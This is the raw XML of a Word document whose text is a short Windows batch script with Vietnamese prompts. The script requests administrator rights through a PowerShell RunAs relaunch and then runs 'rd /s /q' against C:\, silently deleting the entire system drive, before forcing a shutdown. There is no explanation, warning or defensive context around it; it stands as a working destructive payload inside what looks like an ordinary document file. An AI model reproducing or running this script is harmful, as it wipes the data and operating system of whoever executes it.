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20C7" w14:textId="753039BF" w:rsidR="00583063" w:rsidRDefault="00262608" w:rsidP="00583063">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>@echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69245A5E" w14:textId="77777777" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gram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32ABAD74" w14:textId="77777777" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:r>
        <w:t>net session &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2A04CB" w14:textId="77777777" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:r>
        <w:t>if %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>neq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0 (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A06CECB" w14:textId="77777777" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:r>
        <w:t xml:space="preserve">    echo Dang </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yeu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cau</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quyen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237FCB7" w14:textId="77777777" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -Command "Start-Process '%~f0' -Verb RunAs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6D071" w14:textId="77777777" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:r>
        <w:t xml:space="preserve">    exit /b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2182A7B8" w14:textId="77777777" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66247200" w14:textId="4A079F9A" w:rsidR="00583063" w:rsidRDefault="00583063" w:rsidP="00583063">
      <w:r>
        <w:t xml:space="preserve">echo File nay da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chay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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quyen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DAC11B" w14:textId="41CC42A3" w:rsidR="00445EA7" w:rsidRDefault="00262608" w:rsidP="00262608">
      <w:r>
        <w:t>set "target=</w:t>
      </w:r>
      <w:r w:rsidRPr="00262608">
        <w:t>C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18E16A" w14:textId="77777777" w:rsidR="00262608" w:rsidRDefault="00262608" w:rsidP="00262608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /s /q "%target%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E2B79" w14:textId="13EB849C" w:rsidR="0003076B" w:rsidRDefault="0003076B" w:rsidP="00262608">
      <w:r>
        <w:t>shutdown -s -f -t10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC3D24" w14:textId="5285903D" w:rsidR="00262608" w:rsidRDefault="00262608" w:rsidP="00262608">
      <w:r>
        <w:t>pause</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00262608" w:rsidSect="00952270">
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="170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08"/>
    <w:rsid w:val="0003076B"/>
    <w:rsid w:val="00262608"/>
    <w:rsid w:val="00445EA7"/>
    <w:rsid w:val="004A1F12"/>
    <w:rsid w:val="00583063"/>
    <w:rsid w:val="00952270"/>
    <w:rsid w:val="00A41F92"/>
    <w:rsid w:val="00CD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C4EF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{83DD21D4-38A9-4844-AC96-B33F8767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6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6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6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6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6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6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6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6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6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608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608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60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6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6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6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6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60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60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6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6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6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6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6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khoi123ct2011@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>khoi123ct2011@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-07T13:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-07T13:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>